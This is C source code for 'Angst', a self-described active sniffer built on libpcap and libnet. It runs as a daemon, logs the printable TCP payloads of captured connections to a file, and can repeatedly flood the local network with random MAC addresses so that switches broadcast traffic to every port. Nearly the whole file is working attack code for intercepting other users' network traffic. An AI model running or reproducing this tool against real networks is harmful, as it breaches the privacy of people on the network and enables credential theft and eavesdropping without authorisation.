/* Angst - An active sniffer
 * By invisibl <invisibl@bsd.gr>
 *
 * A simple active sniffer, based on libpcap and libnet.  Dumps into a file 
 * the payload of all the TCP packets received on the specified ports.  Also, 
 * it floods the local network with random MAC addresses (like macof v. 1.1
 * by Ian Vitek), causing switches to send packets to all ports.  Made just
 * for testing purposes and fun, so it is still in an infancy state.  Only
 * compiled and tested on OpenBSD.  If you compile it on any other platform,
 * please contact me on the above email address.
 *
 * Compilation:		make
 * Static binary:	make static
 * Debug support:	make debug
 *
 * Greets to: Joy for support, discussion, and ideas.
 *	      Brat3 for discussion.
 *            Jackal for his libpcap based code, some years ago.
 */

#include "angst.h"

pcap_t *pd;			/* packet capture descriptor */
u_char *device = NULL;		/* pointer to the network device */
u_int hdrlen;			/* encapsulation header length */
int resolve_flag = 0;		/* default to not resolve IP addresses */
u_int floodtime = FLOODSECS;	/* flood the local network every 10 seconds */
int pktcount = MACPKTS;		/* flood MACPKTS number of packets */
u_char buffer[BUFSIZE];		/* to store the data of a connection */
FILE *fp;

pcap_handler callback;

int
main(int argc, char *argv[])
{
 int c;
 int datalink = 0;		/* link layer type */
 int promisc_flag = 1;		/* default to set promiscuous mode */
 int active_flag = 0;		/* default to passive sniffing */
 char *logfile = LOGFILE;	/* pathname of the log file */
 bpf_u_int32 localnet, netmask;	/* network number, associated netmask */
 struct bpf_program filter;	/* filter program */
 char *filter_cmd = FILTER;	/* string to be compiled into a filter */
 char errbuf[PCAP_ERRBUF_SIZE];	/* libpcap error handling buffer */

 opterr = 0;	/* don't let getopt() write to stderr */
 while((c = getopt(argc, argv, "ahprvc:f:i:l:s:")) != EOF)
 {
  switch(c)
  {
   case 'a':
	active_flag = 1;
	break;
   case 'h':
	usage(argv[0]);
	exit(EXIT_SUCCESS);
   case 'p':
	promisc_flag = 0;
	break;
   case 'r':
	resolve_flag = 1;
	break;
   case 'v':
	fprintf(stderr, "angst v%s\n", VERSION);
	fprintf(stderr, "by invisibl <invisibl@bsd.gr>\n");
	exit(EXIT_SUCCESS);
   case 'c':
	pktcount = atoi(optarg);
	break;
   case 'f':
	filter_cmd = optarg;
	break;
   case 'i':
	device = optarg;
	break;
   case 'l':
	logfile = optarg;
	break;
   case 's':
	floodtime = atoi(optarg);
	break;
   default:
	usage(argv[0]);
	exit(EXIT_SUCCESS);
  }
 } /* while */

 init_buf(buffer, sizeof(buffer));

 /* set the callback function */
 callback = (pcap_handler)packetdump;

 /* choose packet capturing device */
 if(device == NULL)
 {
  if((device = pcap_lookupdev(errbuf)) == NULL)
   xprintf("pcap_lookupdev error: %s\n", errbuf);
 }

#ifdef DEBUG
 fprintf(stderr, "device = %s\n", device);
#endif /* DEBUG */

 /* open the device */
 if((pd = pcap_open_live(device, SNAPLEN, promisc_flag, TIMEOUT, errbuf)) == NULL)
  xprintf("pcap_open_live error: %s\n", errbuf);

 /* determine link layer type */
 if((datalink = pcap_datalink(pd)) < 0)
  xprintf("pcap_datalink error: %s\n", pcap_geterr(pd));

 /* determine the header length of the link layer encapsulation */
 hdrlen = find_header_length(datalink);

 /* get network address and subnet mask */
 if((pcap_lookupnet(device, &localnet, &netmask, errbuf)) < 0)
 {
  localnet = netmask = 0;
  xprintf("pcap_lookupnet error: %s\n", errbuf);
 }

 /* compile the filter program */
 if((pcap_compile(pd, &filter, filter_cmd, 1, netmask)) < 0)
  xprintf("pcap_compile error: %s\n", pcap_geterr(pd));

 /* set the filter program */
 if((pcap_setfilter(pd, &filter)) < 0)
  xprintf("pcap_setfilter error: %s\n", pcap_geterr(pd));
 
 /* catch some signals in order to tidy things up */
 if((signal(SIGTERM, catcher)) == SIG_ERR)
  xprintf("signal error\n");

 if((signal(SIGINT, catcher)) == SIG_ERR)
  xprintf("signal error\n");

 if((signal(SIGQUIT, catcher)) == SIG_ERR)
  xprintf("signal error\n");

 /* become a daemon */
 if((daemonize(".")) == -1)
  xprintf("fork error\n");

 /* set the flooder, for active sniffing */
 if(active_flag == 1)
 {
  if((signal(SIGALRM, sig_flood)) == SIG_ERR)
   xprintf("signal error\n");

  /* flood for the first time */
  sig_flood(SIGALRM);
 }

 /* open the log file in append mode */
 if((fp = fopen(logfile, "a+")) == NULL)
  xprintf("fopen error: %s\n", strerror(errno));

 /* change the mode of the log file */
 if((chmod(LOGFILE, (S_IRUSR | S_IWUSR))) == -1)
  xprintf("chmod error: %s\n", strerror(errno));

 /* collect and process packets infinite loop */
 if((pcap_loop(pd, -1, callback, NULL)))
  xprintf("pcap_loop error: %s\n", pcap_geterr(pd));

 /* this is not reached */
 fflush(fp);
 fclose(fp);
 pcap_close(pd);
 return(EXIT_SUCCESS);
}

void
xprintf(char *msg, ...)
{
 char buffer[SMALLBUFF];
 va_list args;
   
 va_start(args, msg);
 vsnprintf(buffer, SMALLBUFF, msg, args);
      
 fprintf(stderr, "%s", buffer);
 va_end(args);
 exit(EXIT_FAILURE);
}

void
init_buf(char x[], int size) 
{
 register int n;

 for(n = 0; n < size; n++)
 {
  x[n] = '\0';
 } 
}

void
packetdump(char *user, struct pcap_pkthdr *pkthdr, u_char *pkt)
{
 struct in_addr shost, dhost;	/* source and destination hosts */
 u_short sport, dport;		/* source and destination port */
 struct libnet_ip_hdr *ip;	/* IP protocol header */
 struct libnet_tcp_hdr *tcp;	/* TCP protocol header */
 u_char *data = NULL;		/* packet's payload */
 u_int datalen = 0;		/* payload's length */
 u_int iphlen = 0;		/* IP header length */
 u_int iptlen = 0;		/* IP total length */
 u_int tcphlen = 0;		/* TCP header length */
 u_int buflen = 0;		/* buffer's actual length */
 int i, j = 0;			/* counters */
 u_char temp[SNAPLEN];		/* temporary buffer */
 u_int templen = 0;		/* temporary buffer's length */
 
 if(pkthdr->caplen < LIBNET_IP_H)
  return; /* received truncated IP packet */ 

 ip = (struct libnet_ip_hdr *)(pkt + hdrlen);
 tcp = (struct libnet_tcp_hdr *)(pkt + hdrlen + LIBNET_IP_H);

 if(ip->ip_p == IPPROTO_TCP)
 {
  shost = ip->ip_src;
  dhost = ip->ip_dst;
  iptlen = ntohs(ip->ip_len);

  /* discard fragments */
  if(ntohs(ip->ip_off) & 0x1fff)
   return; /* throwing away fragments */

  iphlen = ip->ip_hl * 4;
  data = pkt + hdrlen + iphlen;

  if(iphlen > iptlen)
   return; /* IP packet received truncated */
  
  datalen = (iptlen - iphlen);
  if(datalen < LIBNET_TCP_H)
   return; /* received truncated TCP packet */

  tcphlen = tcp->th_off * 4;

  sport = ntohs(tcp->th_sport);
  dport = ntohs(tcp->th_dport);
  data += tcphlen;
  datalen -= tcphlen;

  init_buf(temp, sizeof(temp));
  for(i = 0; i <= datalen; i++)
  {
   if(isprint(data[i]))
   {
    temp[j] = data[i];
    j++;
   }
   else if((data[i] == '\r') || (data[i] == '\n'))
   {
    temp[j] = '\n';
    j++;
   }
  }

  templen = strlen(temp);
  strlcat(buffer, temp, sizeof(buffer));
  buflen = strlen(buffer);

  if((tcp->th_flags & TH_FIN) || (tcp->th_flags & TH_RST) || (buflen >= BUFSIZE))
  {
   /* dump everything to the log file when the connection
    * is terminated, or when the maximum number of captured 
    * bytes per connection is reached
    */
   fprintf(fp, "\n[ %s : %u  -> ", libnet_host_lookup(shost.s_addr, resolve_flag), sport);
   fprintf(fp, "%s : %u ]\n\n", libnet_host_lookup(dhost.s_addr, resolve_flag), dport);
   fwrite(buffer, buflen, 1, fp);
   fprintf(fp, "\n");
   fflush(fp);
   init_buf(buffer, sizeof(buffer));
  }
 }
}

/* flooder() is based on macof.c by Dug Song, which
 * in turn is based on macof-1.1 by Ian Vitek
 */
void
flooder(void)
{
 int i;					/* counter */
 struct libnet_link_int *netif;		/* link layer network interface */
 u_char ether_src[ETHER_ADDR_LEN];	/* source ethernet address */
 u_char ether_dst[ETHER_ADDR_LEN];	/* destination ethernet address */
 u_long srcip = 0;			/* source IP address */
 u_long dstip = 0;			/* destination IP address */
 u_short sport = 0;			/* source port number */
 u_short dport = 0;			/* destination port number */
 int pktsize = 0;			/* packet size */
 u_char *packet;			/* pointer to packet buffer */
 char errbuf[LIBNET_ERRBUF_SIZE];	/* error buffer */

 if(device == NULL)
 {
  struct sockaddr_in sin;
  if((libnet_select_device(&sin, &device, errbuf)) == -1)
   xprintf("libnet_select_device error: %s\n", errbuf);
 }

 if((netif = libnet_open_link_interface(device, errbuf)) == NULL)
  xprintf("libnet_open_link_interface error: %s\n", errbuf);

 if((libnet_seed_prand()) == -1)
  xprintf("libnet_seed_prand error\n");

 pktsize = (LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H);

 if((libnet_init_packet(pktsize, &packet)) == -1)
  xprintf("libnet_init_packet error\n");

 for(i = 0; i <= pktcount; i++)
 {
  /* get a random source ethernet address */
  *((in_addr_t *)ether_src) = libnet_get_prand(PRu32);
  *((u_short *)(ether_src + 4)) = libnet_get_prand(PRu16);

  /* get a random destination ethernet address */
  *((in_addr_t *)ether_dst) = libnet_get_prand(PRu32);
  *((u_short *)(ether_dst + 4)) = libnet_get_prand(PRu16);

  /* get a random source IP address */
  srcip = libnet_get_prand(PRu32);

  /* get a random destination IP address */
  dstip = libnet_get_prand(PRu32);

  /* get a random source port number */
  sport = libnet_get_prand(PRu16);

  /* get a random destination port number */
  dport = libnet_get_prand(PRu16);

  /* construct ethernet header */
  libnet_build_ethernet(ether_dst, ether_src, ETHERTYPE_IP, NULL, 0, packet);

  /* construct IP header */
  libnet_build_ip(LIBNET_TCP_H, 0, (libnet_get_prand(PRu16)), 0, 64,
	IPPROTO_TCP, srcip, dstip, NULL, 0, (packet + LIBNET_ETH_H));

  /* construct TCP header */
  libnet_build_tcp(sport, dport, (libnet_get_prand(PRu32)), (libnet_get_prand(PRu32)),
	TH_SYN, 1024, 0, NULL, 0, (packet + LIBNET_ETH_H + LIBNET_IP_H));

  /* calculate both the TCP header and the IP header checksums */
  if((libnet_do_checksum((packet + ETH_H), IPPROTO_TCP, TCP_H)) == -1)
   xprintf("libnet_do_checksum error\n");

  if((libnet_do_checksum((packet + ETH_H), IPPROTO_IP, IP_H)) == -1)
   xprintf("libnet_do_checksum error\n");

  /* inject the packet */
  if((libnet_write_link_layer(netif, device, packet, pktsize)) == -1)
   xprintf("libnet_write_link_layer error\n");

#ifdef DEBUG
  fprintf(stderr, "%s -> ", ether_ntoa((struct ether_addr *)ether_src));
  fprintf(stderr, "%s\n", ether_ntoa((struct ether_addr *)ether_dst));
#endif /* DEBUG */
 }

 return;
}

void
catcher(int signal)
{
 fflush(fp);
 fclose(fp);

 if((chmod(LOGFILE, (S_IRUSR | S_IWUSR))) == -1)
  xprintf("chmod error: %s\n", strerror(errno));

 pcap_close(pd);
 exit(EXIT_SUCCESS);
}

void
sig_flood(int signal)
{
 /* call the MAC flooder */
 flooder();

 /* how often is the flooder() called */
 alarm(floodtime);
 return;
}

void
usage(char *name)
{
 fprintf(stderr, "\nangst v%s\n", VERSION);
 fprintf(stderr, "by invisibl <invisibl@bsd.gr>\n\n");
 fprintf(stderr, "usage: %s [-ahprv] [-c <packets>] [-f <filter expression>]
     [-i <interface>] [-l <log file>] [-s <seconds>]\n\n", name);
 fprintf(stderr, "-a	active sniffing\n");
 fprintf(stderr, "-h	this help message\n");
 fprintf(stderr, "-p	don't put the interface into promiscuous mode\n");
 fprintf(stderr, "-r	resolve IP addresses\n");
 fprintf(stderr, "-v	display the version number and exit\n");
 fprintf(stderr, "-c	specify the number of packets to flood\n");
 fprintf(stderr, "-f	specify a filter expression\n");
 fprintf(stderr, "-i	specify which interface to use\n");
 fprintf(stderr, "-l	specify the log filename\n");
 fprintf(stderr, "-s	specify the seconds between each flooding\n\n");
}

int
find_header_length(int d)
{
#ifdef DEBUG
 printf("datalink: ");
#endif /* DEBUG */
 switch(d)
 {
#ifdef DLT_LOOP
  case DLT_LOOP:
#endif /* DLT_LOOP */
  case DLT_NULL:
#ifdef DEBUG
	printf("no encapsulation, loopback\n");
#endif /* DEBUG */
	return(4);		/* loopback header 4 bytes */
	break;
  case DLT_EN10MB:
#ifdef DEBUG
	printf("ethernet 10mb\n");
#endif /* DEBUG */
	return(14);		/* ethernet 10mb header 14 bytes */
	break;
  case DLT_FDDI:
#ifdef DEBUG
	printf("fddi\n");
#endif /* DEBUG */
	return(21);		/* fddi header 21 bytes */
	break;
  case DLT_PPP:
#ifdef DEBUG
	printf("point-to-point protocol\n");
#endif /* DEBUG */
	return(0);		/* ppp header 0 or 24 bytes? */
	break;
  default:
#ifdef DEBUG
	printf("not found, assuming ethernet 10mb\n");
#endif /* DEBUG */
	return(14);		/* ethernet 10mb header 14 bytes */
	break;
 }
}

int
daemonize(const char *path)
{
 pid_t pid;

 if((signal(SIGTTOU, SIG_IGN)) == SIG_ERR)
  xprintf("signal error\n");

 if((signal(SIGTTIN, SIG_IGN)) == SIG_ERR)
  xprintf("signal error\n");

 if((signal(SIGTSTP, SIG_IGN)) == SIG_ERR)
  xprintf("signal error\n");

 if((signal(SIGHUP, SIG_IGN)) == SIG_ERR)
  xprintf("signal error\n");

 if((pid = fork()) < 0)
  return(-1);
 else if(pid != 0)
  exit(0);

 if(setsid() == -1)
  xprintf("setsid error\n");

 if(chdir(path) == -1)
  xprintf("chdir error\n");

 umask(0);
 return(0);
}

/* EOF */
